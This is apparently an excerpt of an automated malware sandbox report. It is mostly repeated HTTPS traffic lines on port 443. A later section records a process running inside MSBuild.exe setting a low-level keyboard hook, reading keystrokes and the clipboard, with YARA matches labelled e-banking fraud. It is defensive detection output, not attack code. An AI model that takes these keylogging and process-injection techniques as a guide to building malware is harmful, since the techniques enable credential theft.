                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                          Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49731 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49739 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49744 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49929 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49999 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000007_2_004099E4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_004159C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_004159C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,8_2_0040987A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,8_2_004098E2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_00406DFC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,9_2_00406E9F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004068B5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_004072B5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_004159C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,7_2_00409B10
                          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7824, type: MEMORYSTR

                          E-Banking Fraud

                          barindex
                          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000007.00000002.4122174513.0000000002A6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.4120281726.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.4120281726.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
